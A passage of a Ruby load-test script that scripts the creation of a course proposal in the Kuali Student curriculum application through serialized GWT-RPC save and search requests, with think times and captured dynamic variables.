\"5|0|41|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D60D3C6E0D395C18A0F44A2D9D2A7348|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|proposal|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|type|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|kuali.proposal.type.course.create|workflowNode|PreRoute|name|#{opts[:course_title]}|_runtimeData|dirty|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|rationale|#{opts[:course_rationale]}|courseTitle|#{opts[:course_rationale]}|transcriptTitle|subjectArea|courseNumberSuffix|instructors|#{opts[:course_short_title]}|#{opts[:subject_area]}|#{opts[:course_suffix]}|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|personId|#{opts[:instructor]}|id-translation|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|descr|plain|#{opts[:course_description]}\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|8|8|9|10|5|6|7|0|5|8|11|12|13|8|14|12|15|8|16|12|17|8|18|10|5|6|7|0|1|8|19|10|5|6|7|0|2|-11|20|21|1|8|22|20|-22|-15|-17|-5|-13|-23|12|23|-1|-3|8|24|12|25|-13|10|5|6|7|0|1|-17|10|5|6|7|0|5|-26|20|-22|8|26|20|-22|8|27|20|-22|8|28|20|-22|8|29|20|-22|-29|-17|-1|-13|-35|12|30|-37|12|31|-39|12|32|-41|10|5|6|7|0|1|33|34|0|10|5|6|7|0|2|8|35|12|36|8|18|10|5|6|7|0|1|8|35|10|5|6|7|0|1|8|37|12|38|-58|-60|-52|-56|-47|-49|-1|8|29|8|39|10|5|6|7|0|2|8|40|12|41|-13|10|5|6|7|0|1|-17|10|5|6|7|0|1|-71|20|-22|-74|-17|-69|-13|-1|-67|0|0|\"\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}\"\n },\n {\n :dyn_variables => [\n {\"name\" => opts[:proposal_dyn_var_name], \"regexp\" => opts[:proposal_dyn_var_regexp]},\n {\"name\" => 
opts[:clu_ref_dyn_var_name], \"regexp\" => opts[:clu_ref_dyn_var_regexp]},\n                     {\"name\" => opts[:proposal_doc_id_var_name], \"regexp\" => opts[:proposal_doc_id_var_regexp]},\n                     {\"name\" => opts[:version_ind_id_name], \"regexp\" => opts[:version_ind_id_regexp]}\n                    ]\n      }\n    )\n\n    #@request.add(\"DEBUG/proposal_dyn_var_name/%%_#{opts[:proposal_dyn_var_name]}%%\", {}, {'subst' => 'true'})\n    #@request.add(\"DEBUG/clu_ref_dyn_var_name/%%_#{opts[:clu_ref_dyn_var_name]}%%\", {}, {'subst' => 'true'})\n    #@request.add(\"DEBUG/proposal_doc_id_var_name/%%_#{opts[:proposal_doc_id_var_name]}%%\", {}, {'subst' => 'true'})\n    #@request.add(\"DEBUG/version_ind_id_name/%%_#{opts[:version_ind_id_name]}%%\", {}, {'subst' => 'true'})\n    \n    \n    \n    #\n    # Pg 2 - Governance\n    # Campus Locations: All\n    #\n\n    @request.add_thinktime(5)\n\n    # COC Org\n    # Biology Dept\n\n    @request.add_thinktime(3)\n\n    # Admin Org\n    # Botany\n    for i in 1..admin_org.length\n      itr = i-1\n      if(i == admin_org.length)\n        @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n          {\n            'method' => 'POST',\n            'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n            'contents' => \"5|0|16|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|org.queryParam.orgOptionalLongName|#{admin_org[0..itr]}|org.queryParam.orgOptionalType|java.lang.String/2004016611|kuali.org.Department|kuali.org.College|org.search.generic||1|2|3|4|1|5|5|0|6|0|7|2|8|9|0|10|8|11|7|2|12|13|12|14|0|15|16|0|0|\"\n          },\n          {\n            :dyn_variables => [\n                     {\"name\" => opts[:admin_dep_var_name], \"regexp\" => opts[:admin_dep_var_regexp]}\n                    ]\n          }\n        )\n\n        #@request.add(\"DEBUG/admin_dep_var_name/%%_#{opts[:admin_dep_var_name]}%%\", {}, {'subst' => 'true'})\n      else\n        @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n          {\n            'method' => 'POST',\n            'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n            'contents' => \"5|0|16|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|org.queryParam.orgOptionalLongName|#{admin_org[0..itr]}|org.queryParam.orgOptionalType|java.lang.String/2004016611|kuali.org.Department|kuali.org.College|org.search.generic||1|2|3|4|1|5|5|0|6|0|7|2|8|9|0|10|8|11|7|2|12|13|12|14|0|15|16|0|0|\"\n          } \n        )\n      end \n    end\n\n    @request.add_thinktime(15)\n\n    # Save & Continue\n    contents1 = 
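\n    # This save body is long, so it is kept as two Ruby string literals\n    # (contents1/contents2) and concatenated when the request is added; the\n    # split point is arbitrary and has no meaning to the server.\n    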
\"5|0|101|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D60D3C6E0D395C18A0F44A2D9D2A7348|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|campusLocations|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|AL|code|#{opts[:subject_area]}#{opts[:course_suffix]}|courseNumberSuffix|#{opts[:course_suffix]}|courseSpecificLOs|courseTitle|#{opts[:course_title]}|creditOptions|crossListings|descr|plain|#{opts[:course_description]}|expenditure|affiliatedOrgs|fees|formats|gradingOptions|id|%%_#{opts[:clu_ref_dyn_var_name]}%%|instructors|personId|#{opts[:instructor]}|_runtimeData|id-translation|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|joints|level|100|metaInfo|createId|#{opts[:propose_person]}|createTime|org.kuali.student.common.assembly.data.Data$DateValue/2929953165|java.util.Date/1659716317|updateId|updateTime|versionInd|#{version_indicator+=1}|pilotCourse|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|revenues|specialTopicsCourse|state|draft|subjectArea|#{opts[:subject_area]}|termsOffered|transcriptTitle|#{opts[:course_short_title]}|type|kuali.lu.type.CreditCourse|unitsContentOwner|#{opts[:oversight_dept_number]}|#{oversight_department}|unitsDeployment|%%_#{opts[:admin_dep_var_name]}%%|#{admin_org}|variations|versionInfo|currentVersionStart|sequenceNumber|org.kuali.student.common.assembly.data.Data$LongValue/3784756947|java.lang.Long/4227064769|versionIndId|%%_#{opts[:version_ind_id_name]}%%|dirty|proposal|workflowNode|PreRoute|%%_#{opts[:proposal_dyn_var_name]}%%|2|name|#{opts[:course_title]}|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|#{opts[:course_rationale]}|Saved|kuali.proposal.type.course.create|workflowId|%%_#{opts[:proposal_doc_id_var_name]}%%|collaboratorInfo|collaborators\"\n contents2 = 
\"|1|2|3|4|1|5|5|6|7|0|32|8|9|10|5|6|7|0|1|11|12|0|13|14|-1|8|9|8|15|13|16|8|17|13|18|8|19|10|5|6|7|0|0|-1|-15|8|20|13|21|8|22|10|5|6|7|0|0|-1|-21|8|23|10|5|6|7|0|0|-1|-25|8|24|10|5|6|7|0|1|8|25|13|26|-1|-29|8|27|10|5|6|7|0|1|8|28|10|5|6|7|0|0|-37|-39|-1|-35|8|29|10|5|6|7|0|0|-1|-43|8|30|10|5|6|7|0|0|-1|-47|8|31|10|5|6|7|0|0|-1|-51|8|32|13|33|8|34|10|5|6|7|0|1|11|-8|10|5|6|7|0|2|8|35|13|36|8|37|10|5|6|7|0|1|8|35|10|5|6|7|0|1|8|38|13|39|-69|-71|-63|-67|-59|-61|-1|-57|8|40|10|5|6|7|0|0|-1|-77|8|41|13|42|8|43|10|5|6|7|0|5|8|44|13|45|8|46|47|48|3467218721|1309965025280|8|49|13|45|8|50|47|48|3467218721|1309965025280|8|51|13|52|-1|-83|8|53|54|55|0|8|56|10|5|6|7|0|0|-1|-102|8|57|54|-101|8|58|13|59|8|60|13|61|8|62|10|5|6|7|0|0|-1|-112|8|63|13|64|8|65|13|66|8|67|10|5|6|7|0|2|11|-8|13|68|8|37|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|38|13|69|-128|-130|-122|-126|-1|8|67|8|70|10|5|6|7|0|2|11|-8|13|71|8|37|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|38|13|72|-145|-147|-139|-143|-1|8|70|8|73|10|5|6|7|0|0|-1|-154|8|74|10|5|6|7|0|3|8|75|47|48|3467218721|1309965025280|8|76|77|78|1|0|8|79|13|80|-1|-158|8|37|10|5|6|7|0|2|8|60|10|5|6|7|0|1|8|38|13|61|-172|-174|8|81|10|5|6|7|0|3|8|9|54|55|1|8|67|54|-186|8|70|54|-186|-172|-180|-1|-170|8|82|10|5|6|7|0|12|8|83|13|84|8|32|13|85|8|43|10|5|6|7|0|5|8|44|13|45|8|46|47|48|3467218994|1309965025280|8|49|13|45|8|50|47|48|3467219879|1309965025280|8|51|13|86|-193|-199|8|87|13|88|8|89|10|5|6|7|0|1|11|-8|13|33|-193|-217|8|90|13|91|8|92|10|5|6|7|0|0|-193|-225|8|93|10|5|6|7|0|0|-193|-229|8|94|13|95|8|58|13|96|8|65|13|97|8|98|13|99|-1|-191|8|100|10|5|6|7|0|1|8|101|10|5|6|7|0|0|-243|-245|-1|-241|0|0|\"\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|lu.queryParam.luOptionalLuTypeStartsWith|kuali.lu.type.activity.|lu.search.all.lu.Types|lu.resultColumn.luTypeName|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.atptype.duration|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n \n \n #\n # Course Logistics \n # Term: Any\n # Duration Type: Semester\n # Duration Count: 2\n # Assessment Scale: Letter\n # Standard Final Exam\n # Outcome: 10 credits\n # Course Format\n # => Activity Type: Lab, Contact Hours: 5, Frequency: weekly\n # => Duration Type: Weekly\n # => 
Duration: 13\n # => Anticipated class size: 100\n\n @request.add_thinktime(30)\n\n # Save & Continue\n contents1 = \"5|0|126|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D60D3C6E0D395C18A0F44A2D9D2A7348|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|campusLocations|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|AL|_runtimeData|id-translation|All|code|#{opts[:subject_area]}#{opts[:course_suffix]}|courseNumberSuffix|#{opts[:course_suffix]}|courseSpecificLOs|courseTitle|#{opts[:course_title]}|creditOptions|dirty|type|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|fixedCreditValue|created|kuali.resultComponentType.credit.degree.fixed|10|crossListings|descr|plain|#{opts[:course_description]}|expenditure|affiliatedOrgs|fees|formats|activities|activityType|defaultEnrollmentEstimate|kuali.lu.type.activity.Lab|contactHours|unitQuantity|5|unitType|kuali.atp.duration.week|duration|atpDurationTypeKey|timeQuantity|kuali.atp.duration.Week|org.kuali.student.common.assembly.data.Data$IntegerValue/3605481012|gradingOptions|kuali.resultComponent.grade.letter|id|%%_#{opts[:clu_ref_dyn_var_name]}%%|instructors|personId|#{opts[:instructor]}|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|joints|level|100|metaInfo|createId|#{opts[:propose_person]}|createTime|org.kuali.student.common.assembly.data.Data$DateValue/2929953165|java.sql.Timestamp/1769758459|updateId|updateTime|versionInd|#{version_indicator+=1}|pilotCourse|revenues|specialTopicsCourse|state|draft|subjectArea|#{opts[:subject_area]}|termsOffered|kuali.atp.season.Any|transcriptTitle|#{opts[:course_short_title]}|kuali.lu.type.CreditCourse|unitsContentOwner|#{opts[:oversight_dept_number]}|#{oversight_department}|unitsDeployment|%%_#{opts[:admin_dep_var_name]}%%|#{admin_org}|variations|versionInfo|currentVersionStart|sequenceNumber|org.kuali.student.common.assembly.data.Data$LongValue/3784756947|java.lang.Long/4227064769|versionIndId|%%_#{opts[:version_ind_id_name]}%%|finalExamStatus|audit|passFail|proposal|workflowNode|PreRoute|%%_#{opts[:proposal_dyn_var_name]}%%|3|name|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|#{opts[:course_rationale]}|Saved|kuali.proposal.type.course.create|workflowId|%%_#{opts[:proposal_doc_id_var_name]}%%|collaboratorInfo|collaborators|kuali.atp.duration.Semester|STD\"\n contents2 = 
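\n    # Note the #{version_indicator+=1} interpolation in contents1 above: each\n    # successive save bumps the versionInd field, which appears to be the\n    # optimistic-locking counter the server expects to advance on every update.\n    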
\"|1|2|3|4|1|5|5|6|7|0|36|8|9|10|5|6|7|0|2|11|12|0|13|14|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|17|-12|-14|-5|-10|-1|-3|8|18|13|19|8|20|13|21|8|22|10|5|6|7|0|0|-1|-24|8|23|13|24|8|25|10|5|6|7|0|1|11|-8|10|5|6|7|0|3|8|15|10|5|6|7|0|3|8|26|10|5|6|7|0|2|8|27|28|29|1|8|30|28|-48|-40|-42|8|31|28|-48|-38|10|5|6|7|0|1|-42|10|5|6|7|0|1|-51|28|-48|-54|-42|-40|-38|-36|-38|-46|13|32|-49|13|33|-32|-34|-1|-30|8|34|10|5|6|7|0|0|-1|-62|8|35|10|5|6|7|0|1|8|36|13|37|-1|-66|8|38|10|5|6|7|0|1|8|39|10|5|6|7|0|0|-74|-76|-1|-72|8|40|10|5|6|7|0|0|-1|-80|8|41|10|5|6|7|0|1|11|-8|10|5|6|7|0|2|8|42|10|5|6|7|0|1|11|-8|10|5|6|7|0|5|-38|10|5|6|7|0|3|-42|10|5|6|7|0|2|8|43|28|-48|8|44|28|-48|-101|-42|8|31|28|-48|-38|10|5|6|7|0|1|-42|10|5|6|7|0|1|-110|28|-48|-113|-42|-101|-38|-98|-38|-106|13|45|8|46|10|5|6|7|0|3|8|47|13|48|-38|10|5|6|7|0|1|-42|10|5|6|7|0|2|-124|28|-48|8|49|28|-48|-127|-42|-122|-38|-133|13|50|-98|-120|8|51|10|5|6|7|0|3|-38|10|5|6|7|0|1|-42|10|5|6|7|0|2|8|52|28|-48|8|53|28|-48|-141|-42|-138|-38|-146|13|54|-148|55|12|13|-98|-136|-108|55|12|100|-94|-96|-90|-92|8|15|10|5|6|7|0|2|8|31|28|-48|-38|10|5|6|7|0|1|-42|10|5|6|7|0|1|-159|28|-48|-162|-42|-157|-38|-90|-155|-86|-88|-1|-84|8|56|10|5|6|7|0|1|11|-8|13|57|-1|8|56|8|58|13|59|8|60|10|5|6|7|0|1|11|-8|10|5|6|7|0|2|8|61|13|62|8|15|10|5|6|7|0|1|8|61|10|5|6|7|0|1|8|16|13|63|-189|-191|-183|-187|-179|-181|-1|-177|8|64|10|5|6|7|0|0|-1|-197|8|65|13|66|8|67|10|5|6|7|0|5|8|68|13|69|8|70|71|72|3469526397|1309965025280|677000000|8|73|13|69|8|74|71|72|3469529329|1309965025280|609000000|8|75|13|76|-1|-203|8|77|28|29|0|8|78|10|5|6|7|0|0|-1|-222|8|79|28|-221|8|80|13|81|8|82|13|83|8|84|10|5|6|7|0|1|11|-8|13|85|-1|8|84|8|86|13|87|8|27|13|88|8|89|10|5|6|7|0|2|11|-8|13|90|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|91|-251|-253|-245|-249|-1|-243|8|92|10|5|6|7|0|2|11|-8|13|93|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|94|-267|-269|-261|-265|-1|-259|8|95|10|5|6|7|0|0|-1|-275|8|96|10|5|6|7|0|3|8|97|71|72|3469526397|1309965025280|677000000|8|98|99|100|1|0|8|101|13|102|-1|-279|8|15|10|5|6|7|0|2|8|82|10|5|6|7|0|1|8|16|13|83|-293|-295|-42|10|5|6|7|0|5|8|84|28|-48|8|56|28|-48|8|103|28|-48|8|104|28|-48|8|105|28|-48|-293|-42|-1|-291|8|106|10|5|6|7|0|12|8|107|13|108|8|58|13|109|8|67|10|5|6|7|0|5|8|68|13|69|8|70|71|72|3469526678|1309965025280|958000000|8|73|13|69|8|74|71|72|3469530172|1309965025280|452000000|8|75|13|110|-316|-322|8|111|13|24|8|112|10|5|6|7|0|1|11|-8|13|59|-316|-340|8|113|13|114|8|115|10|5|6|7|0|0|-316|-348|8|116|10|5|6|7|0|0|-316|-352|8|117|13|118|8|80|13|119|8|27|13|120|8|121|13|122|-1|-314|8|123|10|5|6|7|0|1|8|124|10|5|6|7|0|0|-366|-368|-1|-364|8|51|10|5|6|7|0|3|-38|10|5|6|7|0|1|-42|10|5|6|7|0|2|8|52|28|-48|8|53|28|-48|-377|-42|-374|-38|-382|13|125|-384|55|12|2|-1|-372|-308|13|126|-310|28|-221|-312|28|-221|0|0|\"\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}\"\n },\n {\n 'subst' => 'true',\n :dyn_variables => [\n {\"name\" => opts[:enroll_est_var_name], \"regexp\" => opts[:enroll_est_var_regexp]},\n {\"name\" => opts[:lab_var_name], \"regexp\" => opts[:lab_var_regexp]},\n {\"name\" => opts[:atp_duration_week_var_name], \"regexp\" => opts[:atp_duration_week_var_regexp]}\n ]\n }\n )\n\n #@request.add(\"DEBUG/enroll_est_var_name/%%_#{opts[:enroll_est_var_name]}%%\", {}, {'subst' => 'true'})\n #@request.add(\"DEBUG/lab_var_name/%%_#{opts[:lab_var_name]}%%\", {}, {'subst' => 'true'})\n 
#@request.add(\"DEBUG/atp_duration_week_var_name/%%_#{opts[:atp_duration_week_var_name]}%%\", {}, {'subst' => 'true'})\n\n @request.add_thinktime(2)\n \n \n \n #\n # Learning Objectives\n #\n\n @request.add_thinktime(5)\n\n # Category\n for i in 1..opts[:lo_category].length\n if(i == opts[:lo_category].length)\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|lo.queryParam.loOptionalCategoryName|#{opts[:lo_category][0..itr]}|lo.search.loCategories|1|2|3|4|1|5|5|0|6|0|7|1|8|9|0|10|11|0|0|0|\"\n },\n {\n :dyn_variables => [\n {\"name\" => opts[:lo_category_id_var_name], \"regexp\" => opts[:lo_category_id_var_regexp]}\n ]\n }\n )\n\n #@request.add(\"DEBUG/lo_category_id_var_name/%%_#{opts[:lo_category_id_var_name]}%%\", {}, {'subst' => 'true'})\n\n else\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|lo.queryParam.loOptionalCategoryName|#{opts[:lo_category][0..itr]}|lo.search.loCategories|1|2|3|4|1|5|5|0|6|0|7|1|8|9|0|10|11|0|0|0|\"\n } \n )\n end \n end\n\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/LoCategoryRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|EDE1DECBD54F5894284944CD8AC3661C|org.kuali.student.lum.common.client.lo.rpc.LoCategoryRpcService|getData|java.lang.String/2004016611|%%_#{opts[:lo_category_id_var_name]}%%|1|2|3|4|1|5|6|\"\n },\n {'subst' => 'true'}\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/LoCategoryRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|EDE1DECBD54F5894284944CD8AC3661C|org.kuali.student.lum.common.client.lo.rpc.LoCategoryRpcService|getLoCategoryType|java.lang.String/2004016611|loCategoryType.subject|1|2|3|4|1|5|6|\"\n }\n )\n\n @request.add_thinktime(25)\n\n # Save & Continue\n contents1 = 
\"5|0|154|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D60D3C6E0D395C18A0F44A2D9D2A7348|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|passFail|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|audit|finalExamStatus|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|STD|campusLocations|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|AL|_runtimeData|id-translation|All|code|#{opts[:subject_area]}#{opts[:course_suffix]}|courseNumberSuffix|#{opts[:course_suffix]}|courseSpecificLOs|loInfo|id|desc|formatted|#{opts[:lo_cat_text]}|plain|name|SINGLE USE LO|sequence|0|metaInfo|loCategoryInfoList|%%_#{opts[:lo_category_id_var_name]}%%|#{opts[:lo_category]}|loRepository|kuali.loRepository.key.singleUse|effectiveDate|org.kuali.student.common.assembly.data.Data$DateValue/2929953165|expirationDate|state|active|type|loCategoryType.subject|createId|admin|createTime|java.sql.Timestamp/1769758459|updateId|updateTime|versionInd|courseTitle|#{opts[:course_title]}|creditOptions|fixedCreditValue|10.0|kuali.creditType.credit.degree.10.0|#{opts[:propose_person]}|resultValues|draft|kuali.resultComponentType.credit.degree.fixed|Credits, Fixed|crossListings|descr|#{opts[:course_description]}|duration|atpDurationTypeKey|kuali.atp.duration.Semester|timeQuantity|org.kuali.student.common.assembly.data.Data$IntegerValue/3605481012|Semester|expenditure|affiliatedOrgs|fees|formats|activities|activityType|kuali.lu.type.activity.Lab|contactHours|unitQuantity|5|unitType|kuali.atp.duration.week|per week|defaultEnrollmentEstimate|kuali.atp.duration.Week|Week|%%_#{opts[:atp_duration_week_var_name]}%%|unitsContentOwner|Lab|%%_#{opts[:lab_var_name]}%%|termsOffered|kuali.lu.type.CreditCourseFormatShell|gradingOptions|kuali.resultComponent.grade.letter|Letter|%%_#{opts[:clu_ref_dyn_var_name]}%%|instructors|personId|#{opts[:instructor]}|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|joints|level|100|2|pilotCourse|revenues|specialTopicsCourse|subjectArea|#{opts[:subject_area]}|kuali.atp.season.Any|Any|transcriptTitle|#{opts[:course_short_title]}|kuali.lu.type.CreditCourse|#{opts[:oversight_dept_number]}|#{oversight_department}|unitsDeployment|%%_#{opts[:admin_dep_var_name]}%%|#{admin_org}|variations|versionInfo|currentVersionStart|sequenceNumber|org.kuali.student.common.assembly.data.Data$LongValue/3784756947|java.lang.Long/4227064769|versionIndId|%%_#{opts[:version_ind_id_name]}%%|Standard final Exam|proposal|workflowNode|PreRoute|%%_#{opts[:proposal_dyn_var_name]}%%|4|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|#{opts[:course_rationale]}|Saved|kuali.proposal.type.course.create|workflowId|%%_#{opts[:proposal_doc_id_var_name]}%%|collaboratorInfo|collaborators\"\n contents2 = 
\"|1|2|3|4|1|5|5|6|7|0|36|8|9|10|11|0|8|12|10|-5|8|13|14|15|8|16|17|5|6|7|0|2|18|19|0|14|20|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|23|-19|-21|-12|-17|-1|-10|8|24|14|25|8|26|14|27|8|28|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|29|17|5|6|7|0|5|8|30|14|0|8|31|17|5|6|7|0|2|8|32|14|33|8|34|14|33|-41|-45|8|35|14|36|8|37|14|38|8|39|17|0|-37|-39|8|40|17|5|6|7|0|1|18|-15|17|5|6|7|0|9|8|30|14|41|8|35|14|42|8|31|17|5|6|7|0|2|8|32|14|0|8|34|14|0|-65|-71|8|43|14|44|8|45|46|0|8|47|46|0|8|48|14|49|8|50|14|51|8|39|17|5|6|7|0|5|8|52|14|53|8|54|46|55|3759152200|1288490188800|0|8|56|14|53|8|57|46|55|3759152200|1288490188800|0|8|58|14|38|-65|-89|-61|-63|-37|-59|-33|-35|-1|8|28|8|59|14|60|8|61|17|5|6|7|0|1|18|-15|17|5|6|7|0|7|8|62|14|63|8|30|14|64|8|39|17|5|6|7|0|5|8|52|14|65|8|54|46|55|3479039543|1309965025280|823000000|8|56|14|65|8|57|46|55|3479039543|1309965025280|823000000|8|58|14|38|-114|-120|8|66|17|5|6|7|0|1|18|-15|14|63|-114|-136|8|48|14|67|8|50|14|68|8|21|17|5|6|7|0|1|8|50|17|5|6|7|0|1|8|22|14|69|-148|-150|-114|-146|-110|-112|-1|-108|8|70|17|5|6|7|0|0|-1|-156|8|71|17|5|6|7|0|1|8|34|14|72|-1|-160|8|73|17|5|6|7|0|3|8|74|14|75|8|76|77|19|2|8|21|17|5|6|7|0|1|8|74|17|5|6|7|0|1|8|22|14|78|-177|-179|-168|-175|-1|-166|8|79|17|5|6|7|0|1|8|80|17|5|6|7|0|0|-187|-189|-1|-185|8|81|17|5|6|7|0|0|-1|-193|8|82|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|83|17|5|6|7|0|1|18|-15|17|5|6|7|0|9|8|84|14|85|8|86|17|5|6|7|0|3|8|87|14|88|8|89|14|90|8|21|17|5|6|7|0|1|8|89|17|5|6|7|0|1|8|22|14|91|-225|-227|-217|-223|-211|-215|8|92|77|19|100|8|73|17|5|6|7|0|3|8|74|14|93|8|76|77|19|13|8|21|17|5|6|7|0|1|8|74|17|5|6|7|0|1|8|22|14|94|-247|-249|-238|-245|-211|-236|8|30|14|95|8|39|17|5|6|7|0|5|8|52|14|65|8|54|46|55|3479549402|1309965025280|682000000|8|56|14|65|8|57|46|